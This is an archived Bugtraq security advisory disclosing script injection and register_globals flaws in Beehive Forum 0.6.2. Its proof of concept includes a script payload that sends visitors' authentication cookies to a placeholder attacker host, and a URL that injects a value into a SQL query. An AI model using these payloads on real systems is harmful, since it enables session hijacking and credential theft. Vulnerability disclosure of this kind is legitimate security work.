Home page logo
/

bugtraq logo Bugtraq mailing list archives

[KAPDA::#17] - beehiveforum Script Injection
From: alireza hassani <trueend5 () yahoo com>
Date: Wed, 21 Dec 2005 03:46:44 -0800 (PST)

KAPDA New advisory

Vendor: http://www.beehiveforum.net
Vulnerable: Version 0.6.2
Bug: HTML Injection , Possible attacks with
register_globals = On
Exploitation: Remote with browser

Description:
--------------------
Beehive Forum is a PHP-based message board system that
uses a MySQL database.
 
Vulnerability:
--------------------
-HTML Injection:
The software does not properly filter HTML tags in
"Name","Description" & "Comment" fields in 'links.php'
& 'links_add.php' hat may allow a remote user to
inject HTML/javascript codes. The hostile code may be
rendered in the web browser of the victim user who
will visit these pages. (persistent)
POC:
--------------------
COMMENT:
very nice link
;)<script>document.location.replace='http://hackersite.com
/cgi-bin/evil_cookie_logger.cgi?'+document.cookie</script>
As a result, the code will be able to access the
target user's cookies (including authentication
cookies)
bh_sess_hash
bh_remeber_username
bh_remember_password
bh_remeber_passhash

-Possible attacks with register_globals = on
When register_globals = on , malicious user may be
able to set $user_sess variable unexpectedly.
POC:
--------------------
http://example.com/beehive/index.php?user_sess=k

error:
--------------------
Error Message for server admins and developers:

Unknown error [1054]

Unknown column 'k' in 'on clause'

SELECT FORUMS.FID, FORUMS.WEBTAG,
CONCAT(FORUMS.WEBTAG, '', '_') AS PREFIX,
FORUMS.ACCESS_LEVEL, USER_FORUM.ALLOWED FROM FORUMS
FORUMS LEFT JOIN USER_FORUM USER_FORUM ON
(USER_FORUM.FID = FORUMS.FID AND USER_FORUM.UID = k)
WHERE DEFAULT_FORUM = 1

Unknown error in line 138 of file db_mysql.inc.php
--------------------
OR
http://example.com/beehive/index.php?user_sess=1+MYFORUM
...

The insufficient protection in index.php:

$forum_settings = forum_get_settings();

include_once(BH_INCLUDE_PATH. "header.inc.php");
include_once(BH_INCLUDE_PATH. "html.inc.php");
include_once(BH_INCLUDE_PATH. "lang.inc.php");
include_once(BH_INCLUDE_PATH. "light.inc.php");
include_once(BH_INCLUDE_PATH. "logon.inc.php");
include_once(BH_INCLUDE_PATH. "messages.inc.php");
include_once(BH_INCLUDE_PATH. "session.inc.php");

$user_sess = bh_session_check(false);


Solution:
--------------------
There is no vendor supplied patch for this issue at
this time.
 
Original Advisories:
--------------------
http://kapda.ir/advisory-158.html
IN Farsi: http://irannetjob.com/content/view/177/28/

Credit :
--------------------
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 


  By Date           By Thread  

Current thread:
  • [KAPDA::#17] - beehiveforum Script Injection alireza hassani (Dec 21)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]